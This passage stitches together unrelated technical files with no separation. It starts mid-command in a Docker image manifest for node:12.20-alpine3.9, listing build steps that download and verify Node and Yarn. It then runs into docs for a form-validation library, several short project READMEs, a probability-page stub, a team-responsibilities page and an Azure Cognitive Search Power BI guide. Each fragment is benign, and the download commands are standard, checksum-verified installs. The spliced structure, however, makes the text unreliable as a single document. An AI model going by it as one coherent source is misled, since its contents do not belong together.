-xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ && ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn && ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg && rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && apk del .build-deps-yarn && yarn --version # Tue, 05 Jan 2021 19:21:22 GMT COPY file:238737301d47304174e4d24f4def935b29b3069c03c72ae8de97d94624382fce in /usr/local/bin/ # Tue, 05 Jan 2021 19:21:23 GMT ENTRYPOINT ["docker-entrypoint.sh"] # Tue, 05 Jan 2021 19:21:24 GMT CMD ["node"] ``` - Layers: - `sha256:ca413bedb4ea5c78f6e0893c7e6abe204eaa1a07d3fb0505e96e0c8d526108f7` Last Modified: Thu, 23 Apr 2020 22:05:29 GMT Size: 2.4 MB (2355563 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:f5db4343eacc03639e3f1a49da466dfd24353ae76ff305b4bbb495339b1a80c9` Last Modified: Tue, 05 Jan 2021 20:01:24 GMT Size: 23.5 MB (23536273 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - 
`sha256:f4011f2092223fb7e4580efd9b7a4fc91d43647f92c267c4c5d43d96d3161002` Last Modified: Tue, 05 Jan 2021 20:01:16 GMT Size: 2.3 MB (2290323 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:c4f9b58e5f2ca45c9018dcf8d05f1715aa9cd066ba52f3ea336e6d36824502df` Last Modified: Tue, 05 Jan 2021 20:01:15 GMT Size: 278.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip ### `node:12.20-alpine3.9` - linux; arm64 variant v8 ```console $ docker pull node@sha256:00da43dd4659a3f9b2ec498af82a236dff8319e8d737a5c0b6af8963f5e9377b ``` - Docker Version: 19.03.12 - Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json` - Total Size: **29.8 MB (29830471 bytes)** (compressed transfer size, not on-disk size) - Image ID: `sha256:0e329a999a6540644860c5d85eee3556ba2da331e38ad6f65194c18cc2c9038f` - Entrypoint: `["docker-entrypoint.sh"]` - Default Command: `["node"]` ```dockerfile # Fri, 24 Apr 2020 00:15:12 GMT ADD file:da3ddeca2212f561c1f428b662a1f1f1200e2d18a42bffb28a0322c235f06582 in / # Fri, 24 Apr 2020 00:15:15 GMT CMD ["/bin/sh"] # Tue, 05 Jan 2021 19:03:20 GMT ENV NODE_VERSION=12.20.1 # Tue, 05 Jan 2021 19:14:35 GMT RUN addgroup -g 1000 node && adduser -u 1000 -G node -s /bin/sh -D node && apk add --no-cache libstdc++ && apk add --no-cache --virtual .build-deps curl && ARCH= && alpineArch="$(apk --print-arch)" && case "${alpineArch##*-}" in x86_64) ARCH='x64' CHECKSUM="783fbfc85228418d0630b778214bdcea3a82d5c3ac13aefcc14e4a81e977d9c9" ;; *) ;; esac && if [ -n "${CHECKSUM}" ]; then set -eu; curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; echo "$CHECKSUM node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - && tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner && ln -s /usr/local/bin/node /usr/local/bin/nodejs; else echo "Building from source" && apk add --no-cache --virtual 
.build-deps-full binutils-gold g++ gcc gnupg libgcc linux-headers make python2 && for key in 4ED778F539E3634C779C87C6D7062848A1AB005C 94AE36675C464D64BAFA68DD7434390BDBE9B9C5 1C050899334244A8AF75E53792EF661D867B9DFA 71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 C82FA3AE1CBEDC6BE46B9360C43CEC45C17AB93C DD8F2338BAE7501E3DD5AC78C273792F7D83545D A48C2BEE680E841632CD4E44F07496B3EB3C1762 108F52B48DB57BB0CC439B2997B01419BD92F80A B9E2F5981AA6E0CD28160D9FF13993A75599653C ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" && gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc && grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - && tar -xf "node-v$NODE_VERSION.tar.xz" && cd "node-v$NODE_VERSION" && ./configure && make -j$(getconf _NPROCESSORS_ONLN) V= && make install && apk del .build-deps-full && cd .. 
&& rm -Rf "node-v$NODE_VERSION" && rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; fi && rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" && apk del .build-deps && node --version && npm --version # Tue, 05 Jan 2021 19:14:37 GMT ENV YARN_VERSION=1.22.5 # Tue, 05 Jan 2021 19:14:43 GMT RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar && for key in 6A010C5166006599AA17F08146C2130DFD2497F5 ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" && gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && mkdir -p /opt && tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ && ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn && ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg && rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && apk del .build-deps-yarn && yarn --version # Tue, 05 Jan 2021 19:14:44 GMT COPY file:238737301d47304174e4d24f4def935b29b3069c03c72ae8de97d94624382fce in /usr/local/bin/ # Tue, 05 Jan 2021 19:14:45 GMT ENTRYPOINT ["docker-entrypoint.sh"] # Tue, 05 Jan 2021 19:14:45 GMT CMD ["node"] ``` - Layers: - `sha256:941f399634ec37b35e6764d0e6cf350593652f06f76586d45ddfc0d77de7a701` Last Modified: Fri, 24 Apr 2020 00:16:02 GMT Size: 2.7 MB (2694467 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:2d1285a7dab0d00cac8721872eed654b4ca462461840bb40017a799f9a594682` Last Modified: Tue, 05 Jan 2021 19:58:04 GMT Size: 24.8 MB (24836368 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - 
`sha256:5d075c5a0c431db4ca4fc7e7103b25356258d4f489e1323e018d22edaf907430` Last Modified: Tue, 05 Jan 2021 19:57:57 GMT Size: 2.3 MB (2299355 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:acefd92ffd4fbf21324fd1b4ae6ca5a44c80341b0c9bfbe8719d6df411fe24fb` Last Modified: Tue, 05 Jan 2021 19:57:57 GMT Size: 281.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip ### `node:12.20-alpine3.9` - linux; ppc64le ```console $ docker pull node@sha256:ee291daa6b4eaad3f02335717cb55c5fc14c077dac81f39904e0b314eed551e4 ``` - Docker Version: 19.03.12 - Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json` - Total Size: **32.1 MB (32118042 bytes)** (compressed transfer size, not on-disk size) - Image ID: `sha256:bb29a75752dbdf309149fd53ac19506c4b18b5dc34c86130343cc77c172abae1` - Entrypoint: `["docker-entrypoint.sh"]` - Default Command: `["node"]` ```dockerfile # Thu, 23 Apr 2020 20:41:14 GMT ADD file:2eaa074d9379f98d31cc4112997e1c1bb55b3871574af6aee576cf1c5ed99645 in / # Thu, 23 Apr 2020 20:41:16 GMT CMD ["/bin/sh"] # Tue, 05 Jan 2021 20:52:40 GMT ENV NODE_VERSION=12.20.1 # Tue, 05 Jan 2021 21:09:04 GMT RUN addgroup -g 1000 node && adduser -u 1000 -G node -s /bin/sh -D node && apk add --no-cache libstdc++ && apk add --no-cache --virtual .build-deps curl && ARCH= && alpineArch="$(apk --print-arch)" && case "${alpineArch##*-}" in x86_64) ARCH='x64' CHECKSUM="783fbfc85228418d0630b778214bdcea3a82d5c3ac13aefcc14e4a81e977d9c9" ;; *) ;; esac && if [ -n "${CHECKSUM}" ]; then set -eu; curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; echo "$CHECKSUM node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - && tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner && ln -s /usr/local/bin/node /usr/local/bin/nodejs; else echo "Building from source" && apk add --no-cache --virtual .build-deps-full 
binutils-gold g++ gcc gnupg libgcc linux-headers make python2 && for key in 4ED778F539E3634C779C87C6D7062848A1AB005C 94AE36675C464D64BAFA68DD7434390BDBE9B9C5 1C050899334244A8AF75E53792EF661D867B9DFA 71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 C82FA3AE1CBEDC6BE46B9360C43CEC45C17AB93C DD8F2338BAE7501E3DD5AC78C273792F7D83545D A48C2BEE680E841632CD4E44F07496B3EB3C1762 108F52B48DB57BB0CC439B2997B01419BD92F80A B9E2F5981AA6E0CD28160D9FF13993A75599653C ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" && gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc && grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - && tar -xf "node-v$NODE_VERSION.tar.xz" && cd "node-v$NODE_VERSION" && ./configure && make -j$(getconf _NPROCESSORS_ONLN) V= && make install && apk del .build-deps-full && cd .. 
&& rm -Rf "node-v$NODE_VERSION" && rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; fi && rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" && apk del .build-deps && node --version && npm --version # Tue, 05 Jan 2021 21:09:13 GMT ENV YARN_VERSION=1.22.5 # Tue, 05 Jan 2021 21:09:30 GMT RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar && for key in 6A010C5166006599AA17F08146C2130DFD2497F5 ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" && gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && mkdir -p /opt && tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ && ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn && ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg && rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && apk del .build-deps-yarn && yarn --version # Tue, 05 Jan 2021 21:09:34 GMT COPY file:238737301d47304174e4d24f4def935b29b3069c03c72ae8de97d94624382fce in /usr/local/bin/ # Tue, 05 Jan 2021 21:09:39 GMT ENTRYPOINT ["docker-entrypoint.sh"] # Tue, 05 Jan 2021 21:09:47 GMT CMD ["node"] ``` - Layers: - `sha256:16f2eaeeecc1446c304d41ae21441f168e376dc76733ec3a9f8f2d17119638a1` Last Modified: Thu, 23 Apr 2020 20:41:57 GMT Size: 2.8 MB (2787865 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:e67e85c6fa2cf1d35579c1f08fc0d9ddf862ca61b3018b844c0c1289601df486` Last Modified: Tue, 05 Jan 2021 22:35:07 GMT Size: 27.0 MB (27030639 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - 
`sha256:7693b75b0be3a96a05ab4d008b83d4b7029b45e36e2adb155a6a3afa6ee2ce84` Last Modified: Tue, 05 Jan 2021 22:34:30 GMT Size: 2.3 MB (2299256 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:f0aaab9b4e3f2d552d263a15f8da9418cf9c5ef70bd16fda2c2d3fe7727da802` Last Modified: Tue, 05 Jan 2021 22:34:29 GMT Size: 282.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip ### `node:12.20-alpine3.9` - linux; s390x ```console $ docker pull node@sha256:593b543927de5654483e448f770c5c1dffaeffc5d63aa8404a2c107ef6692326 ``` - Docker Version: 19.03.12 - Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json` - Total Size: **29.6 MB (29598731 bytes)** (compressed transfer size, not on-disk size) - Image ID: `sha256:c42b0e5f2fd972abf9f1d851a49f8e0ace1eed90b41144ecedb8f1c1bf124f7e` - Entrypoint: `["docker-entrypoint.sh"]` - Default Command: `["node"]` ```dockerfile # Thu, 23 Apr 2020 17:51:19 GMT ADD file:87357838aa76ab358b68ac6734871df2dacb0b5918d89a091836f0d33264f803 in / # Thu, 23 Apr 2020 17:51:20 GMT CMD ["/bin/sh"] # Tue, 05 Jan 2021 20:42:00 GMT ENV NODE_VERSION=12.20.1 # Tue, 05 Jan 2021 21:00:29 GMT RUN addgroup -g 1000 node && adduser -u 1000 -G node -s /bin/sh -D node && apk add --no-cache libstdc++ && apk add --no-cache --virtual .build-deps curl && ARCH= && alpineArch="$(apk --print-arch)" && case "${alpineArch##*-}" in x86_64) ARCH='x64' CHECKSUM="783fbfc85228418d0630b778214bdcea3a82d5c3ac13aefcc14e4a81e977d9c9" ;; *) ;; esac && if [ -n "${CHECKSUM}" ]; then set -eu; curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; echo "$CHECKSUM node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - && tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner && ln -s /usr/local/bin/node /usr/local/bin/nodejs; else echo "Building from source" && apk add --no-cache --virtual .build-deps-full 
binutils-gold g++ gcc gnupg libgcc linux-headers make python2 && for key in 4ED778F539E3634C779C87C6D7062848A1AB005C 94AE36675C464D64BAFA68DD7434390BDBE9B9C5 1C050899334244A8AF75E53792EF661D867B9DFA 71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 C82FA3AE1CBEDC6BE46B9360C43CEC45C17AB93C DD8F2338BAE7501E3DD5AC78C273792F7D83545D A48C2BEE680E841632CD4E44F07496B3EB3C1762 108F52B48DB57BB0CC439B2997B01419BD92F80A B9E2F5981AA6E0CD28160D9FF13993A75599653C ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" && gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc && grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - && tar -xf "node-v$NODE_VERSION.tar.xz" && cd "node-v$NODE_VERSION" && ./configure && make -j$(getconf _NPROCESSORS_ONLN) V= && make install && apk del .build-deps-full && cd .. 
&& rm -Rf "node-v$NODE_VERSION" && rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; fi && rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" && apk del .build-deps && node --version && npm --version # Tue, 05 Jan 2021 21:00:34 GMT ENV YARN_VERSION=1.22.5 # Tue, 05 Jan 2021 21:00:39 GMT RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar && for key in 6A010C5166006599AA17F08146C2130DFD2497F5 ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" && gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && mkdir -p /opt && tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ && ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn && ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg && rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && apk del .build-deps-yarn && yarn --version # Tue, 05 Jan 2021 21:00:40 GMT COPY file:238737301d47304174e4d24f4def935b29b3069c03c72ae8de97d94624382fce in /usr/local/bin/ # Tue, 05 Jan 2021 21:00:40 GMT ENTRYPOINT ["docker-entrypoint.sh"] # Tue, 05 Jan 2021 21:00:41 GMT CMD ["node"] ``` - Layers: - `sha256:1aff3887737eb15ee1a53e92e8c87162b9caac2281ecb01242da00d1a32f5a04` Last Modified: Thu, 23 Apr 2020 17:51:52 GMT Size: 2.6 MB (2550329 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:dda4d4006ee92d40f99a94689d6512c62490ac5b0182457fea168b231d44cebe` Last Modified: Tue, 05 Jan 2021 21:59:59 GMT Size: 24.7 MB (24746435 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - 
`sha256:0a23d2ffa53c938fb8ceb348635139e4299def623f6e49c3c6b89d67e1e7c7bb` Last Modified: Tue, 05 Jan 2021 21:59:54 GMT Size: 2.3 MB (2301686 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:9e9fa7834445f6075e30738259fb044f8d4c82d9a6c66ab6220e952eb7d634b5` Last Modified: Tue, 05 Jan 2021 21:59:54 GMT Size: 281.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
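All of the Dockerfiles above gate the prebuilt-binary path on a `sha256sum -c -` check: they compute or download an expected hash, then feed a `"<hash>  <file>"` line to `sha256sum -c` on stdin. The same verification idiom, isolated on an arbitrary local file as a small sketch:

```shell
# Create a throwaway file to verify (path is arbitrary, for illustration only).
printf 'hello\n' > /tmp/checksum_demo.txt

# Compute its SHA-256 digest, as the image build records for the Node tarball.
CHECKSUM="$(sha256sum /tmp/checksum_demo.txt | awk '{print $1}')"

# Feed "<hash>  <file>" to `sha256sum -c -`, exactly as the RUN steps above do.
# Prints "/tmp/checksum_demo.txt: OK" and exits 0 on success; a mismatch fails
# the pipeline (and with `set -e`, the whole build).
echo "$CHECKSUM  /tmp/checksum_demo.txt" | sha256sum -c -
```

Because `sha256sum -c` exits non-zero on any mismatch, chaining it with `&&` (as the Dockerfiles do) aborts the build before an unverified tarball is ever extracted.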
# FormControl

FormControl is used to map properties in an object model. Most of the UI components will be linked to this control.

## Validation

To create any form object model, we first need to create a validation schema. The following code creates a validation schema for a property that must be of type `number`, is `required`, and whose `max` value is `10`.

```typescript
const schema = NumberType()
  .isRequired()
  .max(10);
```

Then we can create a FormControl for this validation schema.

```typescript
const control = new FormControl(schema);

control.setData(11); // does not trigger a validation

expect(control.isValid).toBeTruthy();
expect(control.hasErrors).toBeFalsy();

await control.validate();

expect(control.isValid).toBeFalsy();
expect(control.hasErrors).toBeTruthy();

console.log(control.errors[0].i18n); // ERRORS.NUMBER.MAX
console.log(control.errors[0].constraints); // { max: 10 }
console.log(control.errors[0].value); // 11
```

::: info Note
Setting a value does not trigger the validation.
:::

## Change state

The following code shows that setting data to be validated, or executing validation, does not change the control state for `isDirty`, `isPrestine`, or `isTouch`.

We have methods to force the change of these states:

- **setDirty**
- **setFocus**
- **setTouch**

:::info Note
If the control has a parent (belongs to a `FormGroup` or `FormArray`), the state will be propagated up to the root.
:::

```typescript
const schema = NumberType()
  .isRequired()
  .max(10);

const control = new FormControl(schema);

control.setData(11); // does not change control state

expect(control.isDirty).toBeFalsy();
expect(control.isPrestine).toBeTruthy();
expect(control.isTouch).toBeFalsy();
expect(control.isValid).toBeTruthy();

await control.validate(); // only changes isValid

expect(control.isDirty).toBeFalsy();
expect(control.isPrestine).toBeTruthy();
expect(control.isTouch).toBeFalsy();
expect(control.isValid).toBeFalsy();

// Changed
control.setDirty();

expect(control.isDirty).toBeTruthy();
expect(control.isPrestine).toBeFalsy();
expect(control.isTouch).toBeTruthy();
expect(control.isValid).toBeFalsy();
```
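The dirty/pristine/touched bookkeeping and parent propagation described above can be illustrated with a minimal, self-contained sketch. This is not the websublime/forms implementation — the class below and its propagation logic are invented for illustration only (the `isPrestine` spelling is kept to match the library documentation):

```typescript
// Minimal illustrative sketch of change-state tracking with parent
// propagation -- NOT the actual websublime/forms implementation.
class SketchControl {
  isDirty = false;
  isTouch = false;
  parent?: SketchControl;

  // Spelled "isPrestine" to match the library documentation above.
  get isPrestine(): boolean {
    return !this.isDirty;
  }

  setDirty(): void {
    this.isDirty = true;
    this.isTouch = true; // becoming dirty implies having been touched
    this.parent?.setDirty(); // propagate the state change up to the root
  }
}

const group = new SketchControl(); // stands in for a FormGroup-like parent
const control = new SketchControl();
control.parent = group;

control.setDirty();
console.log(control.isDirty, control.isPrestine, group.isDirty); // true false true
```

Note that validation state (`isValid`) is deliberately absent from the sketch: as the examples show, it is owned by `validate()` and is independent of the dirty/pristine/touched flags.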
# Personal portfolio

Personal Full-Stack Development Portfolio for Ricardo Shaffer.

## Deployed at:

* RicardoShaffer.com via GitHub.

## Developed Using:

* HTML, CSS, and JS.

## Credits

* Graphics created using Adobe Illustrator and Adobe Animate.
* Framework by **Bootstrap**.
* Certain SVG icons by **Font Awesome**.

## License

* MIT License. (C) 2020, Ricardo Shaffer. All other items are owned by their respective owners.
---
layout: archive
permalink: /discretemathematics/chapter_seven/section_seven_two
title: "7.2 Probability Theory"
author_profile: true
header:
  image: "/images/chicagotwo.jpeg"
---

![inserting an Image](/images/Discrete_Math/Chapter_Seven/Section7.2/Page1.jpg)

![inserting an Image](/images/Discrete_Math/Chapter_Seven/Section7.2/Page2.jpg)

![inserting an Image](/images/Discrete_Math/Chapter_Seven/Section7.2/Page3.jpg)

![inserting an Image](/images/Discrete_Math/Chapter_Seven/Section7.2/Page4.jpg)

![inserting an Image](/images/Discrete_Math/Chapter_Seven/Section7.2/Page5.jpg)

![inserting an Image](/images/Discrete_Math/Chapter_Seven/Section7.2/Page6.jpg)

![inserting an Image](/images/Discrete_Math/Chapter_Seven/Section7.2/Page7.jpg)

![inserting an Image](/images/Discrete_Math/Chapter_Seven/Section7.2/Page8.jpg)
# QRChrome

QRChrome is a very basic Chrome extension that generates QR codes from selected text, link and media URLs, and page URLs. It runs entirely in the browser with no calls to external APIs.

## QRCode.js

This extension is basically a thin wrapper around [QRCode.js](https://github.com/davidshimjs/qrcodejs) by davidshimjs. It's super-fast and cross-browser compatible.

## Icons

QRChrome uses icons by [FatCow](http://www.fatcow.com/free-icons), licensed under the [Creative Commons Attribution 3.0 license](http://creativecommons.org/licenses/by/3.0/us/).

## License

This extension is licensed under the [MIT license](http://opensource.org/licenses/MIT).
# Responsibilities & expectations

Joining the team means assuming one or more of the following responsibilities:

* Investigating and fixing urgent issues and downtime.
* Ensuring that packages are kept up-to-date with upstream versions.
* Ensuring that new distribution versions are supported.
* Reviewing Server Edition pull requests.
* Ensuring that community interactions follow our [Code of Conduct](../CODE_OF_CONDUCT.md).
* Providing [mentorship](mentorship.md) to contributors and fellow team members.

<!-- NOTE: please keep this list in sync with .github/ISSUE_TEMPLATE/apply_join_team.md -->

You do not need to be an expert on all the areas that we deal with. It's fine if your skills in one or more areas are entry-level, as long as you are curious and want to learn. That's why team members mentor each other.

You don't need to assume all responsibilities at once, nor do you need to be available at all times. You are free to decide how much time you are willing to invest as a team member, and you are free to leave whenever you want. Our goal is to build a resilient team by having many members cover for each other, even if they individually only have limited time resources. But at the very least, we expect that you are responsive to contact, and that you are at least occasionally available to help.
---
title: Visualize Azure Cognitive Search logs and metrics with Power BI
description: Visualize Azure Cognitive Search logs and metrics with Power BI
manager: eladz
author: MarkHeff
ms.author: maheff
ms.service: cognitive-search
ms.topic: conceptual
ms.date: 09/25/2020
ms.openlocfilehash: 4056e892855c06ce6c412ec4a592ebcd97fc11a6
ms.sourcegitcommit: 4295037553d1e407edeb719a3699f0567ebf4293
ms.translationtype: HT
ms.contentlocale: de-DE
ms.lasthandoff: 11/30/2020
ms.locfileid: "96325382"
---
# <a name="visualize-azure-cognitive-search-logs-and-metrics-with-power-bi"></a>Visualize Azure Cognitive Search logs and metrics with Power BI

[Azure Cognitive Search](./search-what-is-azure-search.md) lets you store operation logs and service metrics about your search service in an Azure Storage account. This page provides instructions for visualizing that information through a Power BI template app. The app provides detailed insights about your search service, including information about search, indexing, operations, and service metrics.

You can find the Power BI template app **Azure Cognitive Search: Analyze Logs and Metrics** in the [Power BI Apps marketplace](https://appsource.microsoft.com/marketplace/apps).

## <a name="how-to-get-started-with-the-app"></a>How to get started with the app

1. Enable metrics and resource logging for your search service:

    1. Create or identify an existing [Azure Storage account](../storage/common/storage-account-create.md) where you can archive the logs.
    1. In the Azure portal, navigate to your Azure Cognitive Search service.
    1. In the Monitoring section of the left column, select **Diagnostic settings**.

        :::image type="content" source="media/search-monitor-logs-powerbi/diagnostic-settings.png" alt-text="Screenshot showing how to select diagnostic settings in the Monitoring section of the Azure Cognitive Search service." border="false":::

    1. Select **+ Add diagnostic setting**.
    1. Check **Archive to a storage account**, provide your storage account information, and check **OperationLogs** and **AllMetrics**.

        :::image type="content" source="media/search-monitor-logs-powerbi/add-diagnostic-setting.png" alt-text="Screenshot showing how to select metrics and resource logging on the diagnostic settings page.":::

    1. Select **Save**.

1. After logging has been enabled, use your search service to start generating logs and metrics. It can take up to an hour before the containers with these logs appear in Blob storage. You will see an **insights-logs-operationlogs** container for search traffic logs and an **insights-metrics-pt1m** container for metrics.

1. Find the Power BI app for Azure Cognitive Search in the [Power BI Apps marketplace](https://appsource.microsoft.com/marketplace/apps) and install it into a new or existing workspace. The app is named **Azure Cognitive Search: Analyze Logs and Metrics**.

1. After you've installed the app, select it from your list of apps in Power BI.

    :::image type="content" source="media/search-monitor-logs-powerbi/azure-search-app-tile.png" alt-text="Screenshot showing the Azure Cognitive Search app to select from the list of apps.":::

1. Select **Connect** to connect to your data.

    :::image type="content" source="media/search-monitor-logs-powerbi/get-started-with-your-new-app.png" alt-text="Screenshot showing how to connect to your data in the Azure Cognitive Search app.":::

1. Enter the name of the storage account that contains the logs. By default, the app looks at the last 10 days of data, but this value can be changed with the **Days** parameter.

    :::image type="content" source="media/search-monitor-logs-powerbi/connect-to-storage-account.png" alt-text="Screenshot showing how to enter the storage account name and the number of days to query on the Connect to Azure Cognitive Search page.":::

1. Select **Key** as the authentication method and provide your storage account key. Select **Private** as the privacy level. Click Sign in to begin the loading process.

    :::image type="content" source="media/search-monitor-logs-powerbi/connect-to-storage-account-step-two.png" alt-text="Screenshot showing how to enter the authentication method, account key, and privacy level on the Connect to Azure Cognitive Search page.":::

1. Wait for the data to refresh. This can take some time depending on how much data you have. The following indicator shows whether the data is still being refreshed.

    :::image type="content" source="media/search-monitor-logs-powerbi/workspace-view-refreshing.png" alt-text="Screenshot showing how to read the information on the data refresh page.":::

1. Once the data refresh has completed, select **Azure Cognitive Search Report** to view the report.

    :::image type="content" source="media/search-monitor-logs-powerbi/workspace-view-select-report.png" alt-text="Screenshot showing how to select the Azure Cognitive Search report on the data refresh page.":::

1. Make sure to refresh the page after opening the report so that it opens with your data.

